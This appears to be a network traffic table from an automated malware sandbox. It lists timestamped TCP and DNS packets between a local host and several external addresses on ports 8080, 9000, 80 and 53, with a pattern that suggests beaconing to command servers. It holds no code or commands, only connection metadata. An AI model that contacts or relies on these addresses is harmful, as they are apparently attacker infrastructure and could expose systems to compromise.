Mar 17, 2025 12:27:16.246084929 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246089935 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246098042 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246109962 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246114016 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246119022 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246121883 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.246157885 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.246186018 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.251368999 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.251377106 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.251380920 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.251384974 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.251394033 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.251398087 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.251422882 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.251460075 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.291405916 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.291521072 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.339400053 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.339463949 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.391387939 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.391494036 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.443499088 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.443639040 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.491888046 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.491970062 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.539370060 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.539446115 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.587399006 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.587474108 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.635401964 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.635493040 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.687376022 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.687495947 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.735364914 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.735425949 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.788927078 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.788995028 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.835410118 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.835483074 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.883394957 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.884023905 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.931438923 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.933674097 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.979419947 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.979486942 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.027369976 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.029716969 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.075361967 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.075428009 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.127391100 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.129872084 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.179486036 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.181267023 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.227387905 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.229784012 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.275429964 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.277951002 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.323529959 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.323606968 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.371661901 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.371784925 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.424021006 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.424196959 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.475445032 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.477797031 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.523406029 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.523546934 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.571407080 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.571506023 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.619404078 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.619551897 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.667490959 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.669914007 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.723436117 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.723530054 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.775402069 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.775516987 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.823344946 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.825815916 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.871470928 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.871541023 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.923393965 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.923475981 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:17.975615025 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:17.975733042 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.027456045 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.027734995 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.079407930 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.079516888 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.131367922 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.131457090 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.179425001 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.179498911 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.227432013 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.227535963 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.275368929 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.275458097 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.323388100 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.323456049 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.375457048 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.375773907 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.427409887 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.427474022 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.475497007 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.475564003 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.527365923 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.527513027 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.575335026 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.575445890 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.623420954 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.623528004 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.675350904 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.675453901 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.727585077 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.727658987 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.775355101 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.775433064 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.823348999 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.823451042 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.871349096 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.871406078 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.919356108 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:18.919406891 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:18.967472076 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:37.264369011 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:37.382991076 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.383106947 CET	49682	80	192.168.2.8	208.95.112.1
Mar 17, 2025 12:27:37.387711048 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.387834072 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.388029099 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.388048887 CET	80	49682	208.95.112.1	192.168.2.8
Mar 17, 2025 12:27:37.388103962 CET	49682	80	192.168.2.8	208.95.112.1
Mar 17, 2025 12:27:37.392821074 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.740231991 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.745050907 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745075941 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745094061 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745106936 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745125055 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.745127916 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745172024 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.745207071 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.745234013 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745254040 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745270014 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745275021 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.745284081 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745301008 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.745311022 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.745311975 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.745358944 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.749866009 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.749876976 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.749883890 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.749912977 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.749965906 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.750008106 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.750030994 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.750046015 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.750073910 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.750093937 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.795368910 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.795494080 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.843369007 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.843440056 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.891335011 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.891429901 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.939363956 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.939419031 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:37.987464905 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:37.987555027 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.035353899 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.035449028 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.083357096 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.083471060 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.131496906 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.131582022 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.179389000 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.179462910 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.227401018 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.227498055 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.275407076 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.275475025 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.323381901 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.323447943 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.371390104 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.371469975 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.419342995 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.419390917 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.471379042 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.471494913 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.523361921 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.523463011 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.575469971 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.575571060 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.623395920 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.623475075 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.675529957 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.675614119 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.723424911 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.723495007 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.771361113 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.771440983 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.819462061 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.819525003 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.871438980 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.871524096 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.919367075 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.919420958 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:38.967421055 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:38.967475891 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.019413948 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.019474983 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.067429066 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.067483902 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.115374088 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.115488052 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.167355061 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.167419910 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.215425014 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.215536118 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.264328957 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.264445066 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.311384916 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.311496019 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.360142946 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.360196114 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.411448002 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.411526918 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.459381104 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.459458113 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.507373095 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.507472038 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.555413008 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.555504084 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.603394032 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.603487968 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.651402950 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.651520967 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.699357033 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.699506998 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.747432947 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.747559071 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.799362898 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.799473047 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.851385117 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.851516962 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.903394938 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.903486013 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.951406956 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.951477051 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:39.999504089 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:39.999574900 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.047456026 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:40.047530890 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.095400095 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:40.095618963 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.143398046 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:40.143619061 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.191375017 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:40.191512108 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.239428997 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:40.239619970 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.287379026 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:40.287517071 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.339400053 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:40.339508057 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.387360096 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:40.387576103 CET	49689	8080	192.168.2.8	167.99.138.249
Mar 17, 2025 12:27:40.435414076 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:45.466907024 CET	60223	53	192.168.2.8	162.159.36.2
Mar 17, 2025 12:27:45.471663952 CET	53	60223	162.159.36.2	192.168.2.8
Mar 17, 2025 12:27:45.471762896 CET	60223	53	192.168.2.8	162.159.36.2
Mar 17, 2025 12:27:45.476437092 CET	53	60223	162.159.36.2	192.168.2.8
Mar 17, 2025 12:27:45.962815046 CET	60223	53	192.168.2.8	162.159.36.2
Mar 17, 2025 12:27:45.969130039 CET	53	60223	162.159.36.2	192.168.2.8
Mar 17, 2025 12:27:45.969188929 CET	60223	53	192.168.2.8	162.159.36.2
Mar 17, 2025 12:27:58.766537905 CET	8080	49689	167.99.138.249	192.168.2.8
Mar 17, 2025 12:27:58.771020889 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:58.779781103 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:58.779860020 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:58.780046940 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:58.788321018 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.205477953 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.210323095 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210344076 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210422039 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.210428953 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210444927 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210455894 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210494041 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.210511923 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.210525036 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210545063 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210565090 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.210585117 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.210614920 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210625887 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210644007 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.210670948 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.210690022 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.215147018 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.215157032 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.215213060 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.215215921 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.215226889 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.215241909 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.215251923 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.215265036 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.215276957 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.215303898 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.255414009 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.257896900 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.307368040 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.309782028 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.355463982 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.359797955 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.411475897 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.411732912 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.459382057 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.459712029 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.507422924 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.507719994 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.559370995 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.559576988 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.607408047 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.607470036 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.655452013 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.655515909 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.708517075 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.708575964 CET	60233	9000	192.168.2.8	46.4.73.118
